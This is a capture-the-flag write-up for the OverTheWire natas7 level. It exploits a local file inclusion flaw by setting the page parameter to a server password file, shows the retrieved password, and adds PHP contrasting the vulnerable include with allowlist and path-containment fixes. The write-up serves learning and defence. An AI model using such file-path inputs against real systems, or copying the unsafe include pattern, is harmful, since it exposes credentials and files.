Natas7 - natas8

From JaxHax

Level Goal

<Home> <About> 

Solution

This challenge just gives us two hyperlinks.

<Home> Points to http://natas7.natas.labs.overthewire.org/index.php?page=home

<About> Points to http://natas7.natas.labs.overthewire.org/index.php?page=about

This is probably going to be an LFI (Local File Inclusion) bug, since the page parameter looks like it selects a file for the server to include...

Clicking on <Home> gives us:

<Home> <About>
this is the front page 


Clicking on <About> gives us:

<Home> <About>
this is the about page 


Decided to do a view source on this About page and saw a comment that says:

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->


Decided to attempt the LFI route by going to http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

Got the following:

<Home> <About>
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
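
The server-side code for this level is not shown on this page. As an added example (not the challenge's source and not the author's code), the PHP below assumes the common pattern where the page parameter is handed straight to include, and sets it beside two hardened forms. The pages/ directory and all function names are hypothetical.

```php
<?php
// Added illustration, not the natas7 source (the page does not show it).
// Assumption: index.php hands ?page= directly to include.

// Vulnerable pattern (assumed): the client chooses the path.
function render_vulnerable(string $page): void
{
    include $page; // "home" and "/etc/natas_webpass/natas8" are handled alike
}

// Fix 1: the parameter is only a key into a fixed allowlist.
// The pages/ layout is hypothetical.
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

function resolve_allowlisted(string $page): ?string
{
    return PAGES[$page] ?? null;
}

// Fix 2: when names cannot be enumerated, canonicalise the path and
// require the result to stay inside one base directory.
function resolve_contained(string $page, string $base): ?string
{
    $root = realpath($base);
    $path = realpath($base . DIRECTORY_SEPARATOR . $page);
    if ($root === false || $path === false) {
        return null; // base or target does not exist
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the base (e.g. via ../)
    }
    return is_file($path) ? $path : null;
}

// Constructed inputs: the two legitimate values and the one from this page.
foreach (['home', 'about', '/etc/natas_webpass/natas8', '../about'] as $page) {
    $target = resolve_allowlisted($page);
    printf("%-28s %s\n", $page, $target === null ? 'rejected' : 'allowed');
}
```

A rejected value should end in a 404 response and never reach include.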